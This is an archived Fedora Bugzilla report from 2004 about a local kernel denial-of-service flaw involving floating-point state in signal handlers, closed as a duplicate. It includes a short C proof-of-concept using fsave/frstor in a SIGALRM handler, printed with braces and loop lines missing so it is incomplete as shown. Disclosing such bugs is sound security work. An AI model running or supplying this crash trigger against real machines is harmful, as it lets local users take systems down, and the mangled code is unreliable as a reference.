Bug 125940 - Local kernel denial of service exploit
Summary: Local kernel denial of service exploit
Status: CLOSED DUPLICATE of bug 125912
Alias: None
Product: Fedora
Classification: Fedora
Component: kernel (Show other bugs)
(Show other bugs)
Version: 2
Hardware: All Linux
Target Milestone: ---
Assignee: Arjan van de Ven
QA Contact: Brian Brock
Keywords: Security
Depends On:
TreeView+ depends on / blocked
Reported: 2004-06-14 13:21 UTC by Nils O. Selåsdal
Modified: 2007-11-30 22:10 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2006-02-21 19:04:04 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

Description Nils O. Selåsdal 2004-06-14 13:21:48 UTC
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7)
Gecko/20040608 Firefox/0.8

Description of problem:
Seems there is a local kernel denial of service exploit in just about
any kernel out there.
Info is at http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
Fedora Core should be updated. RHEL should be investigated.

Version-Release number of selected component (if applicable):

How reproducible:

Steps to Reproduce:
1. compile and run:
#include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>
  static void Handler(int ignore)
   char fpubuf[108];
   __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
   write(2, "*", 1);
   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  int main(int argc, char *argv[])
   struct itimerval spec;
   signal(SIGALRM, Handler);
   setitimer(ITIMER_REAL, &spec, NULL);
    write(1, ".", 1);
   return 0;

Additional info:
Appears that the kernel doesn't handle floating point exeptions in
signal handlers.

Comment 1 Dave Jones 2004-06-14 16:12:55 UTC

*** This bug has been marked as a duplicate of 125912 ***

Comment 2 Red Hat Bugzilla 2006-02-21 19:04:04 UTC
Changed to 'CLOSED' state since 'RESOLVED' has been deprecated.

Note You need to log in before you can comment on or make changes to this bug.